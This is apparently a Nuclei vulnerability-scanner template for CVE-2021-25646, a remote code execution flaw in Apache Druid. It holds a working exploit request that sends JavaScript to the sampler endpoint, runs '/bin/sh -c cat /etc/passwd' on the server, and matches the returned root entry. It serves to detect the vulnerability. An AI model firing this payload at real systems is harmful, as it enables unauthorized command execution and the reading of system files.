2021-02-03 09:24:49 +00:00
id: CVE-2021-25646
info:
  name: Apache Druid RCE
  author: pikpikcu
  severity: high
  description: |
    Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
    Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
  reference:
    - https://paper.seebug.org/1476/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-25646
    cwe-id: CWE-732
  tags: cve,cve2021,apache,rce,druid
requests:
  - raw:
      - |
        POST /druid/indexer/v1/sampler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "type": "index",
          "spec": {
            "ioConfig": {
              "type": "index",
              "firehose": {
                "type": "local",
                "baseDir": "/etc",
                "filter": "passwd"
              }
            },
            "dataSchema": {
              "dataSource": "odgjxrrrePz",
              "parser": {
                "parseSpec": {
                  "format": "javascript",
                  "timestampSpec": {},
                  "dimensionsSpec": {},
                  "function": "function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
                  "": {
                    "enabled": "true"
                  }
                }
              }
            }
          },
          "samplerConfig": {
            "numRows": 10
          }
        }
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "application/json"
        part: header
      - type: word
        words:
          - "numRowsRead"
          - "numRowsIndexed"
        part: body
        condition: and
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body